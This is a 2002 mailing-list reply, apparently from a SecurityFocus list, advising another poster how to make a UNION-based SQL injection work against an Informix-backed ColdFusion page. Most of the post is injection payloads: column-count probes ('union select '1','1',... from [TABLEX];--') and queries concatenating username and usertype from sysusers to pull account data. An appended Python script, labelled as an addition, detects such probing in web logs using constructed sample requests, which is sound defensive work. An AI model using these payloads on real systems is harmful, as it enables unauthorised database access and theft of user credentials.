On Wed, 3 Jul 2002 16:28:18 -0600
"Whyte, Jesse" <Jesse.Whyteat_private> wrote:

> http://app.default.com/default.cfm?var='UNION%20ALL%20SELECT%20username%2C%2
> 0usertype%20FROM%20sysusers
> [Informix][Informix ODBC Driver][Informix]Corresponding column types must be
> compatible for each UNION statement.

..........................

hola,

i never did a test on informix .. but ...

The first test (queries) should be something like:
(using "1" should satisfy all different data types for all the other fields)
check out a standard-table with many fields (or something like "dual" on oracle ..)

---*---
union select '1' from [TABLEX];--
union select '1','1' from [TABLEX];--
union select '1','1','1' from [TABLEX];--
union select '1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1' from [TABLEX];--
union select '1','1','1','1','1','1','1','1','1','1' from [TABLEX];--
(and so on ...)
---*---

.. you know that you hit the right column-number when there is no more
error-message ..

username and usertype could be concatenated "username||usertype" (check the
"concat"-syntax for informix). so there is only one char, varchar, text (or
similar) field left that you have to "hit directly".

now try to brute-force any proper "query-signature" of the union statement:

---*---
union select '1',(username||usertype),['1'xnumber of fields] from sysusers;--
union select '1','1',(username||usertype),['1'xnumber of fields -1 ] from sysusers;--
union select '1','1','1',(username||usertype),['1'xnumber of fields -2 ] from sysusers;--
union select '1','1','1','1',(username||usertype),['1'xnumber of fields -3 ] from sysusers;--
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields - 4] from sysusers;--
union select '1','1','1','1','1',(username||usertype),['1'xnumber of fields -5 ] from sysusers;--
(and so on ...)
---*---

check the response for differences ... that should do the trick ...

another possibility is "typecasting" every field within the result-set into
1 type ("text" for example). (check out your informix-manual for the correct
syntax). the only thing you have to guess (brute-force) with this method is
the number of fields in the result-set.

hope that helps,
nice day,

martin
meiat_private
http://www.websec.org

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
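
Added example (not part of the original post or of any tool it mentions): the column-count probing described above leaves a recognisable trail in web server logs, because one client sends UNION SELECT requests to the same page with a changing number of select-list items. The sketch below flags that pattern; the log tuples, IP addresses, page names and the min_distinct threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample data: (client IP, request URL). Not taken from the post.
SAMPLE_LOG = [
    ("198.51.100.7", "/search.cfm?q=trade+union+news"),
    ("203.0.113.5", "/default.cfm?var='%20union%20select%20'1'%20from%20tablex;--"),
    ("203.0.113.5", "/default.cfm?var='%20union%20select%20'1','1'%20from%20tablex;--"),
    ("203.0.113.5", "/default.cfm?var='%20union%20select%20'1','1','1'%20from%20tablex;--"),
    ("203.0.113.5", "/default.cfm?var='%20union%20select%20'1','1','1','1'%20from%20tablex;--"),
    ("198.51.100.7", "/default.cfm?var=42"),
]

# Select list of a UNION [ALL] SELECT ... FROM inside a decoded query string.
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(.*?)\s+from\b", re.I | re.S)


def select_width(url):
    """Number of select-list items in a UNION SELECT in the query string, or None."""
    match = UNION_RE.search(unquote_plus(urlsplit(url).query))
    if not match:
        return None
    items, depth, in_quote = 1, 0, False
    for ch in match.group(1):
        if ch == "'":
            in_quote = not in_quote
        elif not in_quote:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == "," and depth == 0:
                items += 1  # only top-level commas separate columns
    return items


def find_enumeration(log, min_distinct=3):
    """Map (client, path) -> sorted widths where a client tried several column counts."""
    widths = defaultdict(set)
    for client, url in log:
        width = select_width(url)
        if width is not None:
            widths[(client, urlsplit(url).path)].add(width)
    return {key: sorted(seen) for key, seen in widths.items() if len(seen) >= min_distinct}


if __name__ == "__main__":
    for (client, path), seen in find_enumeration(SAMPLE_LOG).items():
        print(f"{client} probed {path} with UNION widths {seen}")
```

Requiring several distinct widths from one client keeps a single stray match, such as a search phrase containing "union select ... from", from raising an alert.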